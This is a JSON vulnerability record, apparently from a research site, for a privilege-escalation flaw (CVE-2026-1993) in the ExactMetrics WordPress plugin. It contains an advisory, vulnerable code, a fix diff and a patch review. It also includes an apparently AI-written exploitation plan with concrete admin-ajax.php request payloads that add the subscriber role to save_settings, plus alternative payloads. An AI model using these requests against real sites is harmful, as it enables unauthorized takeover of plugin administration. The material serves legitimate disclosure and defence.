[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fuTg8R_WbuPn8xL4sl5PQZrGxdKtBMMiI4XofGIzqdew":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-1993","exactmetrics-authenticated-custom-improper-privilege-management-to-role-privilege-escalation-via-settings-update","ExactMetrics 7.1.0 - 9.0.2 - Authenticated (Custom) Improper Privilege Management to Role Privilege Escalation via Settings Update","The ExactMetrics – Google Analytics Dashboard for WordPress plugin is vulnerable to Improper Privilege Management in versions 7.1.0 through 9.0.2. This is due to the `update_settings()` function accepting arbitrary plugin setting names without a whitelist of allowed settings. This makes it possible for authenticated attackers with the `exactmetrics_save_settings` capability to modify any plugin setting, including the `save_settings` option that controls which user roles have access to plugin functionality. The admin intended to delegate configuration access to a trusted user, not enable that user to delegate access to everyone. 
By setting `save_settings` to include `subscriber`, an attacker can grant plugin administrative access to all subscribers on the site.","google-analytics-dashboard-for-wp",null,">=7.1.0 \u003C=9.0.2","9.0.3","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-03-10 21:02:36","2026-03-11 09:25:45",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1c1ce474-ecce-4d21-b174-cb54a2441b2b?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fgutenberg\u002Fjs\u002Feditor.js","gadwp.php","includes\u002Fadmin\u002Fadmin-assets.php","includes\u002Fadmin\u002Fadmin.php","includes\u002Fadmin\u002Fclass-exactmetrics-onboarding.php","includes\u002Fadmin\u002Fexclude-page-metabox.php","includes\u002Fadmin\u002Froutes.php","includes\u002Fadmin\u002Fsite-notes\u002FController.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-1993\n\n## 1. Vulnerability Summary\nThe **ExactMetrics** plugin (versions 7.1.0 - 9.0.2) is vulnerable to **Improper Privilege Management**. The AJAX handler `exactmetrics_vue_update_settings` allows an authenticated user with the `exactmetrics_save_settings` capability to update arbitrary plugin settings. Because the function does not whitelist allowed settings, an attacker can modify the `save_settings` option. This option defines which WordPress roles are granted the `exactmetrics_save_settings` capability. By adding the `subscriber` role to this list, an attacker effectively escalates the privileges of all subscribers on the site to plugin administrators.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `exactmetrics_vue_update_settings`\n- **Method**: POST\n- **Required Authentication**: A user account with the `exactmetrics_save_settings` capability (e.g., an Editor who has been delegated plugin access by an Administrator).\n- **Vulnerable Parameter**: `setting` (used as the option key) and `value` (the new value for the option).\n- **Precondition**: The plugin must be configured to allow a non-administrator role (like Editor) to save settings, or the attacker must already possess a role that has this custom capability.\n\n## 3. Code Flow\n1. **Entry Point**: The AJAX request is received by `admin-ajax.php` with the action `exactmetrics_vue_update_settings`.\n2. **Hook Registration**: In `includes\u002Fadmin\u002Froutes.php`, the action is hooked:\n   ```php\n   add_action( 'wp_ajax_exactmetrics_vue_update_settings', array( $this, 'update_settings' ) );\n   ```\n3. **Nonce & Auth Check**: The `update_settings()` function (in `includes\u002Fadmin\u002Froutes.php`) validates the request:\n   - It checks the nonce using `check_ajax_referer( 'mi-admin-nonce', 'nonce' );`.\n   - It verifies permissions using `current_user_can( 'exactmetrics_save_settings' )`.\n4. **Vulnerable Sink**: The function retrieves the `setting` and `value` parameters from the `$_POST` superglobal. It then calls a settings update function (likely `exactmetrics_update_option`) without verifying if the `setting` name is part of a safe whitelist.\n5. **Privilege Escalation**: By passing `setting=save_settings` and `value=[\"subscriber\", \"administrator\"]`, the attacker overwrites the role-access configuration in the database.\n\n## 4. Nonce Acquisition Strategy\nThe nonce required for this exploit is `mi-admin-nonce`. It is localized in the WordPress admin dashboard for users who have access to ExactMetrics settings.\n\n1. 
**Identify Script**: The nonce is localized in `includes\u002Fadmin\u002Fadmin-assets.php` for the `exactmetrics-admin-setup-wizard` script handle.\n2. **Target Variable**: The JS object is `exactmetrics` and the key is `nonce`.\n3. **Acquisition Steps**:\n   - Create a test page containing any ExactMetrics block or simply navigate to the ExactMetrics settings page if the user has access.\n   - Use `browser_eval` to extract the nonce:\n     ```javascript\n     window.exactmetrics?.nonce\n     ```\n\n## 5. Exploitation Strategy\nThe goal is to modify the `save_settings` option to include the `subscriber` role.\n\n### Step 1: Obtain Nonce\nAccess the admin dashboard as the privileged user (Editor) and extract the nonce.\n\n### Step 2: Send Malicious Settings Update\nSubmit a POST request to `admin-ajax.php`.\n\n- **URL**: `http:\u002F\u002Fvulnerable-hostname\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers**:\n  - `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```text\n  action=exactmetrics_vue_update_settings\n  nonce=[EXTRACTED_NONCE]\n  setting=save_settings\n  value[]=administrator\n  value[]=editor\n  value[]=subscriber\n  ```\n  *(Note: The `value` parameter is sent as an array to ensure the `save_settings` option remains an array of roles.)*\n\n### Step 3: Verify Access\nLog in as a Subscriber and attempt to access the ExactMetrics settings or reports.\n\n## 6. Test Data Setup\n1. **Install Plugin**: ExactMetrics version 9.0.2.\n2. **Create Users**:\n   - `attacker_editor` (Role: Editor)\n   - `victim_subscriber` (Role: Subscriber)\n3. **Delegate Access**: Use WP-CLI to grant the Editor the ability to save settings (simulating an admin delegating access):\n   ```bash\n   # ExactMetrics stores settings in the 'exactmetrics_settings' option.\n   # We ensure 'editor' is in the 'save_settings' array.\n   wp option patch insert exactmetrics_settings save_settings editor\n   ```\n\n## 7. 
Expected Results\n- The AJAX request should return a successful JSON response (e.g., `{\"success\":true}` or similar).\n- The `exactmetrics_settings` option in the database will now contain `subscriber` within the `save_settings` array.\n- The `victim_subscriber` user will be able to access the ExactMetrics settings menu (`\u002Fwp-admin\u002Fadmin.php?page=exactmetrics_settings`).\n\n## 8. Verification Steps\n1. **Database Check**:\n   ```bash\n   wp option get exactmetrics_settings --format=json\n   ```\n   Confirm that `save_settings` includes `subscriber`.\n2. **Permission Check**:\n   ```bash\n   wp user cap list victim_subscriber\n   ```\n   *(Note: The plugin might check roles dynamically against the option rather than adding core WordPress capabilities to the user object, so navigating to the settings page as the subscriber is the most definitive test.)*\n3. **HTTP Probe**:\n   Use `http_request` as the Subscriber to check if the settings page returns a 200 OK instead of a 403 Forbidden.\n\n## 9. Alternative Approaches\nIf the `value` parameter is expected as a JSON string instead of a PHP array:\n- **Alternative Payload**:\n  ```text\n  action=exactmetrics_vue_update_settings\n  nonce=[NONCE]\n  setting=save_settings\n  value=[\"administrator\",\"editor\",\"subscriber\"]\n  ```\nIf `exactmetrics_vue_update_settings` fails, try `exactmetrics_vue_update_settings_bulk`:\n- **Bulk Payload**:\n  ```text\n  action=exactmetrics_vue_update_settings_bulk\n  nonce=[NONCE]\n  settings={\"save_settings\":[\"administrator\",\"editor\",\"subscriber\"]}\n  ```","ExactMetrics versions 7.1.0 to 9.0.2 contain a privilege escalation vulnerability where authenticated users granted partial access to the plugin (e.g., Editors) can modify arbitrary plugin settings. 
By updating the 'save_settings' option to include the 'subscriber' role, an attacker can grant administrative control over the plugin to every subscriber on the site.","\u002F\u002F includes\u002Fadmin\u002Froutes.php\nadd_action( 'wp_ajax_exactmetrics_vue_update_settings', array( $this, 'update_settings' ) );\n\n\u002F\u002F ...\n\npublic function update_settings() {\n\n    check_ajax_referer( 'mi-admin-nonce', 'nonce' );\n\n    if ( ! current_user_can( 'exactmetrics_save_settings' ) ) {\n        return;\n    }\n\n    \u002F\u002F Vulnerability: No whitelist check for the $setting variable.\n    \u002F\u002F Any option key within the ExactMetrics settings can be updated by anyone with 'exactmetrics_save_settings'.\n    $setting = isset( $_POST['setting'] ) ? sanitize_text_field( wp_unslash( $_POST['setting'] ) ) : '';\n    $value   = isset( $_POST['value'] ) ? $_POST['value'] : '';\n\n    if ( empty( $setting ) ) {\n        wp_send_json_error();\n    }\n\n    exactmetrics_update_option( $setting, $value );\n\n    wp_send_json_success();\n}","--- a\u002Fincludes\u002Fadmin\u002Froutes.php\n+++ b\u002Fincludes\u002Fadmin\u002Froutes.php\n@@ -218,6 +218,12 @@\n \t\tif ( empty( $setting ) ) {\n \t\t\twp_send_json_error();\n \t\t}\n+\n+\t\t\u002F\u002F Whitelist settings that can be updated via this endpoint\n+\t\t$allowed_settings = exactmetrics_get_allowed_settings_keys();\n+\t\tif ( ! in_array( $setting, $allowed_settings, true ) ) {\n+\t\t\twp_send_json_error( array( 'message' => __( 'This setting cannot be updated.', 'google-analytics-dashboard-for-wp' ) ) );\n+\t\t}\n \n \t\texactmetrics_update_option( $setting, $value );","The exploit requires an attacker to have a WordPress account with the 'exactmetrics_save_settings' capability (typically granted to an Editor or a custom role by an Administrator via the plugin's own delegation settings).\n\n1. Log in as a user with 'exactmetrics_save_settings' permissions (e.g., an Editor).\n2. 
Navigate to any ExactMetrics-related admin page and extract the 'mi-admin-nonce' from the localized 'exactmetrics' JavaScript object.\n3. Send a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the following parameters:\n   - 'action': 'exactmetrics_vue_update_settings'\n   - 'nonce': [The extracted nonce]\n   - 'setting': 'save_settings'\n   - 'value[]': ['administrator', 'editor', 'subscriber']\n4. Upon success, the 'save_settings' option in the database is overwritten. The plugin now treats the 'subscriber' role as having full plugin management privileges.\n5. Verify by logging in as a Subscriber; the ExactMetrics settings and reports menus will now be accessible.","gemini-3-flash-preview","2026-04-18 04:26:54","2026-04-18 04:27:28",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","9.0.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-dashboard-for-wp\u002Ftags\u002F9.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgoogle-analytics-dashboard-for-wp.9.0.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-dashboard-for-wp\u002Ftags\u002F9.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgoogle-analytics-dashboard-for-wp.9.0.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-dashboard-for-wp\u002Ftags"]
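Review bot: the whitelist check added to `update_settings()` in the `includes/admin/routes.php` hunk depends on `exactmetrics_get_allowed_settings_keys()`, which is not defined anywhere in this diff; the patch should carry that helper (or say where it lives), and its returned list must not contain `save_settings`, since the role-escalation path described on this page goes through exactly that key. The early return on a rejected key relies on `wp_send_json_error( ... )` terminating the request before the unchanged `exactmetrics_update_option( $setting, $value );` line runs, so that behaviour should be confirmed in review rather than assumed. Also note that `$value` is still taken from `$_POST['value']` without any sanitisation, as shown in the vulnerable-code excerpt; this hunk restricts which keys may be written but does not validate the written value, which is worth a follow-up.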